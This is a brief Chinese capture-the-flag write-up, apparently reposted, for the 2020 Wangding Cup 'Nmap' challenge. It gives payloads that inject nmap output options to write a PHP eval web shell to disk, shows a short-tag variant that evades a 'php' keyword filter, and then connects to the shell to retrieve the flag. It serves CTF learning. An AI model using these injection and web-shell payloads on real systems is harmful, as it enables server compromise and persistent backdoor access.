[网鼎杯 2020 朱雀组]Nmap


 

[BUUCTF 2018]Online Tool类似,直接用里面的payload

' <?php @eval($_POST["hack"]);?> -oG hack.php '

回显hacker,经查,php被过滤,使用短标签绕过

' <?= @eval($_POST["hack"]);?> -oG hack.phtml '

成功写入

访问一下

http://b829d549-378b-494f-87e4-a74d13e0c223.node3.buuoj.cn/hack.phtml

 

蚁剑连接一波,在根目录下找到flag


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM